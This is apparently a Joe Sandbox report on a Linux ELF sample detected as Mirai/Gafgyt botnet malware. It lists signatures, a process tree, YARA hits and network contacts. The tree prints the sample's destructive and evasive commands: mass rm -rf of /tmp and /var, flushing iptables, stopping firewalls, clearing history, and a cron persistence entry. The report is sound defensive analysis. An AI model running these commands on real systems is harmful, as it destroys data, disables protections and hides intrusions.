Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
HNzkADzkE2.elf

Overview

General Information

Sample name:HNzkADzkE2.elf
renamed because original name is a hash value
Original sample name:a794f1aa38c600d553af040bdf199400.elf
Analysis ID:1527520
MD5:a794f1aa38c600d553af040bdf199400
SHA1:ab0803048cc5b741d08f618022e9c647ee810e54
SHA256:f094ee0a1262df00a37029bea3e3b9c1ceb62acedd436e199d78e848c4feac58
Tags:32elfmipsmirai
Infos:

Detection

Gafgyt, Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Yara detected Mirai
Executes the "iptables" command to insert, remove and/or manipulate rules
Manipulation of devices in /dev
Sample deletes itself
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Tries to stop the "iptables" service
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1527520
Start date and time:2024-10-07 01:11:48 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 35s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:HNzkADzkE2.elf
renamed because original name is a hash value
Original Sample Name:a794f1aa38c600d553af040bdf199400.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/2@57/0
  • Connection to analysis system has been lost, crash info: Unknown
  • VT rate limit hit for: HNzkADzkE2.elf
Command:/tmp/HNzkADzkE2.elf
PID:5434
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Octopus Caught You
Standard Error:Failed to stop iptables.service: Unit iptables.service not loaded.
Failed to stop firewall.service: Unit firewall.service not loaded.
sh: 1: history: not found
sh: 1: history: not found
  • system is lnxubuntu20
  • HNzkADzkE2.elf (PID: 5434, Parent: 5355, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/HNzkADzkE2.elf
    • sh (PID: 5436, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
      • sh New Fork (PID: 5438, Parent: 5436)
      • rm (PID: 5438, Parent: 5436, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/HNzkADzkE2.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-XwDkMg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-wDpo1e /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-FOsKgj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-k0Nyjf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi /var/log/wtmp
    • sh (PID: 5442, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/*"
      • sh New Fork (PID: 5444, Parent: 5442)
      • rm (PID: 5444, Parent: 5442, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/*
    • sh (PID: 5445, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -F"
      • sh New Fork (PID: 5447, Parent: 5445)
      • iptables (PID: 5447, Parent: 5445, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
    • sh (PID: 5451, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 busybox"
      • sh New Fork (PID: 5453, Parent: 5451)
      • pkill (PID: 5453, Parent: 5451, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 busybox
    • sh (PID: 5454, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 perl"
      • sh New Fork (PID: 5460, Parent: 5454)
      • pkill (PID: 5460, Parent: 5454, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 perl
    • sh (PID: 5465, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 python"
      • sh New Fork (PID: 5467, Parent: 5465)
      • pkill (PID: 5467, Parent: 5465, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 python
    • sh (PID: 5474, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service iptables stop"
      • sh New Fork (PID: 5476, Parent: 5474)
      • service (PID: 5476, Parent: 5474, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service iptables stop
        • service New Fork (PID: 5477, Parent: 5476)
        • basename (PID: 5477, Parent: 5476, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5478, Parent: 5476)
        • basename (PID: 5478, Parent: 5476, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5479, Parent: 5476)
        • systemctl (PID: 5479, Parent: 5476, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5480, Parent: 5476)
          • service New Fork (PID: 5481, Parent: 5480)
          • systemctl (PID: 5481, Parent: 5480, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5482, Parent: 5480)
          • sed (PID: 5482, Parent: 5480, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5476, Parent: 5474, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop iptables.service
    • sh (PID: 5484, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/sbin/iptables -F; /sbin/iptables -X"
      • sh New Fork (PID: 5486, Parent: 5484)
      • iptables (PID: 5486, Parent: 5484, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -F
      • sh New Fork (PID: 5487, Parent: 5484)
      • iptables (PID: 5487, Parent: 5484, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -X
    • sh (PID: 5488, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service firewall stop"
      • sh New Fork (PID: 5490, Parent: 5488)
      • service (PID: 5490, Parent: 5488, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service firewall stop
        • service New Fork (PID: 5491, Parent: 5490)
        • basename (PID: 5491, Parent: 5490, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5492, Parent: 5490)
        • basename (PID: 5492, Parent: 5490, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5493, Parent: 5490)
        • systemctl (PID: 5493, Parent: 5490, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5494, Parent: 5490)
          • service New Fork (PID: 5495, Parent: 5494)
          • systemctl (PID: 5495, Parent: 5494, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5496, Parent: 5494)
          • sed (PID: 5496, Parent: 5494, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5490, Parent: 5488, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop firewall.service
    • sh (PID: 5499, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "history -c"
    • sh (PID: 5501, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf ~/.bash_history"
      • sh New Fork (PID: 5503, Parent: 5501)
      • rm (PID: 5503, Parent: 5501, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.bash_history
    • sh (PID: 5504, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "history -w"
    • HNzkADzkE2.elf New Fork (PID: 5506, Parent: 5434)
      • HNzkADzkE2.elf New Fork (PID: 5512, Parent: 5506)
        • sh (PID: 5514, Parent: 5512, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /dev/ocmount"
          • sh New Fork (PID: 5539, Parent: 5514)
          • chmod (PID: 5539, Parent: 5514, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /dev/ocmount
        • sh (PID: 5540, Parent: 5512, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
        • sh (PID: 5589, Parent: 5512, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /dev/ocmount
          • sh New Fork (PID: 5594, Parent: 5589)
        • HNzkADzkE2.elf New Fork (PID: 5825, Parent: 5512)
          • sh (PID: 5828, Parent: 5825, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5842, Parent: 5828)
            • iptables (PID: 5842, Parent: 5828, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
          • sh (PID: 5854, Parent: 5825, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5856, Parent: 5854)
            • busybox (PID: 5856, Parent: 5854, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
          • sh (PID: 5857, Parent: 5825, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5859, Parent: 5857)
          • sh (PID: 5860, Parent: 5825, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5862, Parent: 5860)
          • sh (PID: 5863, Parent: 5825, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5865, Parent: 5863)
            • busybox (PID: 5865, Parent: 5863, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
      • HNzkADzkE2.elf New Fork (PID: 5803, Parent: 5506)
        • sh (PID: 5806, Parent: 5803, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5819, Parent: 5806)
          • iptables (PID: 5819, Parent: 5806, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • sh (PID: 5823, Parent: 5803, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5841, Parent: 5823)
          • busybox (PID: 5841, Parent: 5823, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • sh (PID: 5843, Parent: 5803, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5845, Parent: 5843)
        • sh (PID: 5846, Parent: 5803, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5849, Parent: 5846)
        • sh (PID: 5850, Parent: 5803, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5852, Parent: 5850)
          • busybox (PID: 5852, Parent: 5850, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
  • systemd New Fork (PID: 5546, Parent: 1)
  • upowerd (PID: 5546, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 5588, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
  • gsd-wacom (PID: 5588, Parent: 1588, MD5: 13778dd1a23a4e94ddc17ac9caa4fcc1) Arguments: /usr/libexec/gsd-wacom
  • sh (PID: 5595, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
  • gsd-keyboard (PID: 5595, Parent: 1588, MD5: 8e288fd17c80bb0a1148b964b2ac2279) Arguments: /usr/libexec/gsd-keyboard
  • systemd New Fork (PID: 5596, Parent: 1)
  • upowerd (PID: 5596, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 5638, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5638, Parent: 1588, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • fusermount (PID: 5641, Parent: 3122, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • sh (PID: 5642, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 5642, Parent: 1588, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • sh (PID: 5643, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
  • gsd-smartcard (PID: 5643, Parent: 1588, MD5: ea1fbd7f62e4cd0331eae2ef754ee605) Arguments: /usr/libexec/gsd-smartcard
  • systemd New Fork (PID: 5644, Parent: 1)
  • upowerd (PID: 5644, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • wrapper-2.0 (PID: 5669, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • sh (PID: 5687, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-datetime
  • gsd-datetime (PID: 5687, Parent: 1588, MD5: d80d39745740de37d6634d36e344d4bc) Arguments: /usr/libexec/gsd-datetime
  • wrapper-2.0 (PID: 5690, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • sh (PID: 5691, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
  • gsd-media-keys (PID: 5691, Parent: 1588, MD5: a425448c135afb4b8bfd79cc0b6b74da) Arguments: /usr/libexec/gsd-media-keys
  • wrapper-2.0 (PID: 5692, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • systemd New Fork (PID: 5693, Parent: 1)
  • upowerd (PID: 5693, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 5707, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
  • gsd-screensaver-proxy (PID: 5707, Parent: 1588, MD5: 77e309450c87dceee43f1a9e50cc0d02) Arguments: /usr/libexec/gsd-screensaver-proxy
  • wrapper-2.0 (PID: 5721, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • sh (PID: 5728, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sound
  • gsd-sound (PID: 5728, Parent: 1588, MD5: 4c7d3fb993463337b4a0eb5c80c760ee) Arguments: /usr/libexec/gsd-sound
  • wrapper-2.0 (PID: 5742, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • sh (PID: 5749, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-a11y-settings
  • gsd-a11y-settings (PID: 5749, Parent: 1588, MD5: 18e243d2cf30ecee7ea89d1462725c5c) Arguments: /usr/libexec/gsd-a11y-settings
  • wrapper-2.0 (PID: 5752, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • sh (PID: 5757, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 5757, Parent: 1588, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • sh (PID: 5758, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
  • gsd-power (PID: 5758, Parent: 1588, MD5: 28b8e1b43c3e7f1db6741ea1ecd978b7) Arguments: /usr/libexec/gsd-power
  • systemd New Fork (PID: 5759, Parent: 1)
  • upowerd (PID: 5759, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • udisksd New Fork (PID: 5818, Parent: 802)
  • udisksd New Fork (PID: 5840, Parent: 802)
  • dumpe2fs (PID: 5840, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/sda2
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
HNzkADzkE2.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    HNzkADzkE2.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      5434.1.00007f101c400000.00007f101c435000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
        5434.1.00007f101c400000.00007f101c435000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5825.1.00007f101c400000.00007f101c435000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
            5825.1.00007f101c400000.00007f101c435000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: HNzkADzkE2.elfAvira: detected
              Source: HNzkADzkE2.elfReversingLabs: Detection: 52%
              Source: /usr/bin/pkill (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5467)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

              Networking

              barindex
              Source: /bin/sh (PID: 5842)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5819)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /usr/sbin/service (PID: 5476)Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5476)Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: global trafficTCP traffic: 192.168.2.13:40720 -> 212.118.43.167:2222
              Source: global trafficTCP traffic: 192.168.2.13:43652 -> 156.238.224.214:8443
              Source: /bin/sh (PID: 5447)Iptables executable: /usr/sbin/iptables -> iptables -FJump to behavior
              Source: /bin/sh (PID: 5486)Iptables executable: /sbin/iptables -> /sbin/iptables -FJump to behavior
              Source: /bin/sh (PID: 5487)Iptables executable: /sbin/iptables -> /sbin/iptables -XJump to behavior
              Source: /bin/sh (PID: 5842)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5819)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5434)Socket: 127.0.0.1:8013Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5803)Socket: 0.0.0.0:31337Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
              Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
